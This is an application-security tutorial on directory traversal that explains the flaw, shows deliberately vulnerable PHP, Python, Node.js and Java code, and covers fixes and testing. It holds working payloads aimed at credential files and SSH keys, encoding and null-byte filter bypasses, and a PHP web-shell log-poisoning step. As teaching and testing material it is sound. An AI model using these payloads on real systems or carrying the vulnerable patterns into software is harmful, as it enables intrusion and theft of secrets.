Thilan Dissanayaka Application Security April 09, 2020

Directory Traversal Attacks

Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.

It falls under “Broken Access Control,” a long-standing OWASP Top 10 category, and it’s trivially easy to test for. Yet it keeps showing up, because developers keep building file paths from user input without validating them.

How Directory Traversal Works

Filesystems are hierarchical. Every file has a path relative to the root:

/
├── etc/
│   ├── passwd
│   ├── shadow
│   └── hosts
├── var/
│   └── www/
│       └── html/
│           ├── index.php
│           ├── images/
│           │   ├── logo.png
│           │   └── banner.jpg
│           └── uploads/
└── home/
    └── thilan/

The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.
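To make the resolution concrete, here is a minimal sketch using Python's posixpath.normpath, which collapses .. components purely as text (it never touches the disk). The paths are the ones from the tree above. It also shows that extra ../ sequences past the root are simply ignored, which is why payloads can safely use more of them than strictly needed.

```python
import posixpath

# ".." removes the component before it.
up_two = posixpath.normpath("/var/www/html/images/../../")
print(up_two)  # /var/www

# Going "above" the root stays at the root, so surplus "../" is harmless.
past_root = posixpath.normpath("/var/www/html/images/../../../../../../etc/passwd")
print(past_root)  # /etc/passwd
```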

The attack targets any feature where user input is used to construct a file path:

Image/file viewers (?file=report.pdf)
File download endpoints (?download=document.docx)
Template/page includes (?page=about)
Language file loaders (?lang=en)

The Classic Example

A web application serves images through a PHP script:

<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;

header('Content-Type: image/jpeg');
readfile($path);
?>

Normal use:

GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png  ✓

Attack:

GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd  ← Game over

The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.

/var/www/html/images/  ← starting here
../                    → /var/www/html/
../                    → /var/www/
../                    → /var/
../                    → /
etc/passwd             → /etc/passwd

What Attackers Target

Once you can read arbitrary files, here’s what’s valuable:

Linux Systems

# System files
../../../../etc/passwd              # User accounts (always readable)
../../../../etc/shadow              # Password hashes (usually needs root)
../../../../etc/hosts               # Network configuration
../../../../proc/self/environ       # Environment variables (may contain secrets)
../../../../proc/self/cmdline       # How the process was started

# Application files
../../../../var/www/html/config.php  # Database credentials
../../../../var/www/html/.env        # Environment configuration
../../../../var/log/apache2/access.log  # Web server logs

# SSH keys
../../../../home/thilan/.ssh/id_rsa  # Private SSH key
../../../../root/.ssh/id_rsa         # Root's private SSH key

Windows Systems

..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config   # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa

Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.
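A small sketch of that behavior, using Python's ntpath module (it applies Windows path rules on any operating system, so this runs on Linux too). The C:/inetpub/wwwroot/images base directory is a hypothetical example, not something taken from a real application.

```python
import ntpath

# Forward slashes and backslashes are mixed freely in one payload.
mixed = "C:/inetpub/wwwroot/images/..\\../web.config"

# Windows rules treat both characters as separators and resolve the ".." parts.
resolved = ntpath.normpath(mixed)
print(resolved)  # C:\inetpub\web.config
```

A filter that only looks for ../ would miss the ..\ half of this payload.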

Application Source Code

This is often more valuable than system files. Reading the application’s source code reveals:

Database credentials in config files
API keys and secrets
Business logic vulnerabilities
Other file paths to target
Internal API endpoints

Vulnerable Patterns Across Languages

PHP — File Inclusion

PHP’s include() and require() are especially dangerous because they don’t just read the file — they execute it as PHP code. This turns directory traversal into Remote Code Execution.

<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page);
?>

GET /index.php?page=../../../../var/log/apache2/access.log

If the attacker can inject PHP code into the access log (via a crafted User-Agent header) and the web server user can read that log, include() will execute it. This is the classic log poisoning technique. Note that the include here takes the parameter as-is: if the code appended a suffix such as '.php', the request would look for access.log.php instead, and the attacker would first need a way to drop the suffix (see the null byte bypass below).

# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the poisoned log file; the injected code runs with cmd=id
GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

Python — Flask/Django

from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: User input directly in file path
    return send_file(f'/var/www/uploads/{filename}')

GET /download?file=../../../../etc/passwd

Node.js — Express

const express = require('express');
const path = require('path');

const app = express();

app.get('/files', (req, res) => {
    const filename = req.query.name;
    // VULNERABLE: Path concatenation with user input
    const filepath = path.join(__dirname, 'public', filename);
    res.sendFile(filepath);
});

GET /files?name=../../../../etc/passwd

Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.
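Python's path helpers behave much the same way. The sketch below uses posixpath (Linux rules on any host) with the same /app/public base as the note above. It also shows an extra wrinkle: in Python's join(), an absolute argument discards the base entirely, so the attacker does not even need ../ sequences. Node's path.resolve() treats absolute arguments the same way.

```python
import posixpath

base = "/app/public"

# Relative traversal: join() concatenates, normpath() collapses the ".." parts.
relative = posixpath.normpath(posixpath.join(base, "../../../../etc/passwd"))
print(relative)  # /etc/passwd

# Absolute input: join() throws the base away.
absolute = posixpath.join(base, "/etc/passwd")
print(absolute)  # /etc/passwd
```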

Java — Servlet

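import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String filename = request.getParameter("file");
        // VULNERABLE: Direct path concatenation
        File file = new File("/var/www/uploads/" + filename);

        // try-with-resources closes the stream even if the copy fails
        try (FileInputStream fis = new FileInputStream(file)) {
            fis.transferTo(response.getOutputStream());  // Java 9+
        }
    }
}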

Bypass Techniques

Developers often implement naive filters that attackers can bypass:

Bypass 1: URL Encoding

If the application blocks ../ but doesn’t decode before checking:

%2e%2e%2f                  → ../
%2e%2e/                    → ../
..%2f                      → ../
%2e%2e%5c                  → ..\  (Windows)

Double encoding (if the server decodes twice):

%252e%252e%252f            → %2e%2e%2f → ../
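The sketch below illustrates why checking before decoding fails. naive_filter_allows is a hypothetical filter written for this example; it inspects the raw value, while a later layer (simulated here with urllib.parse.unquote) decodes it.

```python
from urllib.parse import unquote

def naive_filter_allows(raw: str) -> bool:
    """Hypothetical filter that inspects the raw, still-encoded value."""
    return "../" not in raw

single = "%2e%2e%2fetc%2fpasswd"
double = "%252e%252e%252fetc%252fpasswd"

# Both payloads pass the filter because no literal "../" is present yet.
print(naive_filter_allows(single), naive_filter_allows(double))  # True True

# One decode exposes the single-encoded payload...
print(unquote(single))            # ../etc/passwd
# ...and the double-encoded one needs two decodes.
print(unquote(double))            # %2e%2e%2fetc%2fpasswd
print(unquote(unquote(double)))   # ../etc/passwd
```

The takeaway is ordering: decode exactly once, then validate the decoded value.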

Bypass 2: Null Byte (PHP < 5.3.4)

If the application appends an extension:

include($_GET['page'] . '.php');

The attacker uses a null byte to truncate the extension:

GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd

This was fixed in PHP 5.3.4 but is still relevant for legacy applications.
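As a rough illustration of the mechanism, the sketch below simulates how a C API that expects NUL-terminated strings would see the payload. c_string_view is a hypothetical helper for this example only. The second half shows how a modern runtime (Python 3 here) handles the same input: it refuses the path instead of truncating it.

```python
def c_string_view(path: str) -> str:
    """Simulate a C function that stops reading at the first NUL byte."""
    return path.split("\0", 1)[0]

payload = "../../../../etc/passwd\0.php"
truncated = c_string_view(payload)
print(truncated)  # ../../../../etc/passwd

# Python rejects paths with an embedded NUL rather than silently cutting them.
rejected = False
try:
    open(payload)
except ValueError:
    rejected = True
print(rejected)  # True
```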

Bypass 3: Path Truncation

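On older PHP versions (before 5.3) and on older Windows systems, overly long paths were silently truncated (the limit is 4096 bytes on Linux and much shorter on Windows). Padding the payload pushes an appended extension such as .php past the limit, so it gets cut off: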

../../../../etc/passwd/./././././././././././././.  (repeat until path limit)

Bypass 4: Alternative Separators

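Windows accepts both \ and / as separators, so a filter that only looks for ../ misses the backslash variants. A filter that strips ../ in a single pass can also be defeated by nesting the sequence inside itself:

..\..\..\..\windows\win.ini      # backslashes (Windows)
....//....//....//etc/passwd     # stripping "../" once leaves ../../../etc/passwd
..\/..\/..\/etc/passwd           # mixed separators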
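The nested payload is easiest to understand by running it through a strip-style filter. Both functions below are hypothetical filters written for this sketch. The first removes ../ in a single pass, the second repeats until nothing is left to remove.

```python
def strip_once(value: str) -> str:
    """Hypothetical naive filter: removes "../" in a single pass."""
    return value.replace("../", "")

def strip_until_stable(value: str) -> str:
    """Repeat the removal until no "../" remains."""
    while "../" in value:
        value = value.replace("../", "")
    return value

payload = "....//....//....//etc/passwd"

# Removing the inner "../" glues the outer characters into a new "../".
print(strip_once(payload))          # ../../../etc/passwd
print(strip_until_stable(payload))  # etc/passwd
```

Even the repeating version only handles this one spelling; it still ignores backslashes and encoded forms, which is why resolving and then validating the path is the more robust approach.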

Bypass 5: Bypassing Prefix Checks

If the application checks that the path starts with the expected directory:

$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
    readfile($path);  // Still vulnerable!
}

The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:

/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)
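The same mistake, sketched in Python for comparison. The two function names are made up for this example, and posixpath.normpath stands in for path resolution (it is purely lexical and does not follow symlinks, so real code would use realpath instead).

```python
import posixpath

BASE = "/var/www/uploads/"

def prefix_check_before_resolution(user_input: str) -> bool:
    # Always True: the string was built by prepending BASE.
    return (BASE + user_input).startswith(BASE)

def prefix_check_after_resolution(user_input: str) -> bool:
    # Collapse ".." first, then compare.
    return posixpath.normpath(BASE + user_input).startswith(BASE)

payload = "../../../../etc/passwd"
print(prefix_check_before_resolution(payload))      # True  (bypassed)
print(prefix_check_after_resolution(payload))       # False (blocked)
print(prefix_check_after_resolution("report.pdf"))  # True  (legitimate)
```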

Prevention

1. Use `basename()` — Strip the Path Entirely

The simplest and most effective fix: use basename() to extract just the filename, discarding any directory components.

<?php
$filename = basename($_GET['file']);  // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;

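if (is_file($path)) {  // is_file() also rejects "" and "..", which point at a directory
    readfile($path);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

This is the nuclear option: it discards every directory component, so traversal sequences never reach the filesystem call. Use it when the user should only specify a filename, never a path.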
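Python offers the same operation. The sketch below uses posixpath and ntpath, which apply Linux and Windows rules regardless of the host OS, to show one caveat: basename only strips the separators its platform recognizes. PHP's basename() follows the same rule, treating the backslash as a separator only on Windows.

```python
import ntpath
import posixpath

payload_unix = "../../../../etc/passwd"
payload_win = "..\\..\\..\\windows\\win.ini"

print(posixpath.basename(payload_unix))  # passwd
# Under Linux rules a backslash is an ordinary character, so nothing is stripped.
print(posixpath.basename(payload_win))   # ..\..\..\windows\win.ini
# Under Windows rules both separators are recognized.
print(ntpath.basename(payload_win))      # win.ini
# ".." has no directory part to strip, so it survives and needs its own check.
print(posixpath.basename(".."))          # ..
```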

2. Validate with `realpath()` — Verify After Resolution

Resolve the full path and verify it’s within the expected directory:

<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];

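$fullPath = realpath($baseDir . $filename);
$realBase = realpath($baseDir);

// Check that:
// 1. realpath() succeeded (file exists)
// 2. The resolved path starts with our base directory plus a separator.
//    realpath() drops the trailing slash, and without the separator a sibling
//    such as /var/www/uploads_old would also match the prefix.
if ($fullPath !== false && $realBase !== false
        && strpos($fullPath, $realBase . DIRECTORY_SEPARATOR) === 0) {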
    readfile($fullPath);
} else {
    http_response_code(403);
    echo "Access denied";
}
?>

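This defeats the ../ and symlink tricks, because realpath() resolves both to the actual filesystem path before the check runs. It does not decode URL encoding: PHP has already decoded $_GET once, and the application should not decode the value a second time. We then verify that the result is within our allowed directory.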
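One detail of the prefix comparison deserves a closer look: a resolved base directory has no trailing slash, so a plain "starts with" test also accepts sibling directories that share the prefix. The sketch below shows the problem and one way around it. The uploads_old directory and both function names are hypothetical.

```python
import posixpath

def naive_within(base: str, candidate: str) -> bool:
    return candidate.startswith(base)

def strict_within(base: str, candidate: str) -> bool:
    # commonpath() compares whole path components, not raw characters.
    return posixpath.commonpath([base, candidate]) == base

base = "/var/www/uploads"
sibling = "/var/www/uploads_old/secret.txt"
inside = "/var/www/uploads/report.pdf"

print(naive_within(base, sibling))   # True  (wrongly accepted)
print(strict_within(base, sibling))  # False
print(strict_within(base, inside))   # True
```

Comparing against the base plus a trailing separator achieves the same result as commonpath().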

3. Whitelist / ID Mapping — Don’t Use Filenames at All

The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:

<?php
$fileMap = [
    '1' => '/var/www/uploads/report-q1.pdf',
    '2' => '/var/www/uploads/report-q2.pdf',
    '3' => '/var/www/uploads/brochure.pdf',
];

$id = $_GET['id'];

if (isset($fileMap[$id])) {
    readfile($fileMap[$id]);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.

4. Python — Secure Path Handling

import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
UPLOAD_DIR = '/var/www/uploads'

@app.route('/download')
def download():
    filename = request.args.get('file', '')

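    # Resolve the base and the requested path (follows symlinks, collapses ..)
    base = os.path.realpath(UPLOAD_DIR)
    full_path = os.path.realpath(os.path.join(base, filename))

    # Verify it's within the upload directory. Comparing against base + os.sep
    # stops sibling directories such as /var/www/uploads_old from matching.
    if not full_path.startswith(base + os.sep):
        abort(403)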

    if not os.path.isfile(full_path):
        abort(404)

    return send_file(full_path)

5. Node.js — Secure Path Handling

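const express = require('express');
const path = require('path');
const fs = require('fs');

const app = express();
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    if (typeof filename !== 'string') {
        return res.status(400).send('Bad request');
    }
    const fullPath = path.resolve(UPLOAD_DIR, filename);

    // Verify the resolved path is within our directory. Appending path.sep
    // keeps sibling directories such as "uploads_old" from passing the check.
    if (!fullPath.startsWith(UPLOAD_DIR + path.sep)) {
        return res.status(403).send('Access denied');
    }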

    if (!fs.existsSync(fullPath)) {
        return res.status(404).send('Not found');
    }

    res.sendFile(fullPath);
});

The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.
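As a compact illustration of that pattern, here is a sketch of a reusable helper built on pathlib. resolve_inside and is_allowed are hypothetical names chosen for this example, and the temporary directory stands in for a real upload directory.

```python
import tempfile
from pathlib import Path

def resolve_inside(base_dir: str, user_path: str) -> Path:
    """Return the resolved path if it stays inside base_dir, else raise ValueError."""
    base = Path(base_dir).resolve()
    candidate = (base / user_path).resolve()  # follows symlinks, collapses ".."
    candidate.relative_to(base)               # raises ValueError when outside base
    return candidate

def is_allowed(base_dir: str, user_path: str) -> bool:
    try:
        resolve_inside(base_dir, user_path)
        return True
    except ValueError:
        return False

with tempfile.TemporaryDirectory() as base_dir:
    results = {
        p: is_allowed(base_dir, p)
        for p in ("report.pdf", "../../../../etc/passwd", "/etc/passwd")
    }
print(results)
```

Because relative_to() compares whole path components, the helper avoids the sibling-directory pitfall of raw string prefixes, and it rejects absolute inputs as well as ../ sequences.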

6. Web Server Configuration

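As an additional layer, configure your web server to refuse direct requests for sensitive files. This does not stop a vulnerable script from reading those files through the filesystem, but it limits what is exposed over HTTP: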

# Nginx — restrict access to sensitive files
location ~ /\. {
    deny all;  # Block dotfiles (.env, .git, .htaccess)
}

location ~* \.(conf|ini|log|sh|sql)$ {
    deny all;  # Block sensitive file extensions
}

# Apache — same in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
    Require all denied
</FilesMatch>

Testing for Directory Traversal

Manual Testing

# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"

# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"

# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"
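Typing these variants by hand gets tedious, so a small generator can help. The sketch below builds the plain, URL-encoded, double-encoded, and null-byte forms used above. traversal_payloads is a hypothetical helper, and it only produces strings; sending them is left to curl or another client, and only against systems you are authorized to test.

```python
def traversal_payloads(target: str, depth: int = 4) -> dict:
    """Build common encodings of a ../ payload for the given target file."""
    plain = "../" * depth + target.lstrip("/")
    # Encode dots and slashes by hand so the output matches the forms above.
    encoded = plain.replace(".", "%2e").replace("/", "%2f")
    return {
        "plain": plain,
        "url_encoded": encoded,
        "double_encoded": encoded.replace("%", "%25"),
        "null_byte": plain + "%00",
    }

for name, value in traversal_payloads("/etc/passwd").items():
    print(f"{name:15} {value}")
```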

With Burp Suite

Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.

Automated

# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200

# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd
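A 200 status alone can be misleading, since many applications return 200 for custom error pages. Checking the response body for a known file signature is a more reliable signal. The sketch below is one hypothetical way to do that; the SIGNATURES patterns are assumptions about what typical /etc/passwd and win.ini files contain, not an exhaustive list.

```python
import re

# Assumed content markers for two commonly targeted files.
SIGNATURES = {
    "/etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.MULTILINE),
    "win.ini": re.compile(r"^\[(fonts|extensions)\]", re.MULTILINE | re.IGNORECASE),
}

def leaked_file(body: str):
    """Return the name of the file the body appears to contain, or None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(body):
            return name
    return None

print(leaked_file("root:x:0:0:root:/root:/bin/bash\n"))  # /etc/passwd
print(leaked_file("<html>File not found</html>"))        # None
```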

Final Thoughts

Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.

Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.

The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.

Thanks for reading!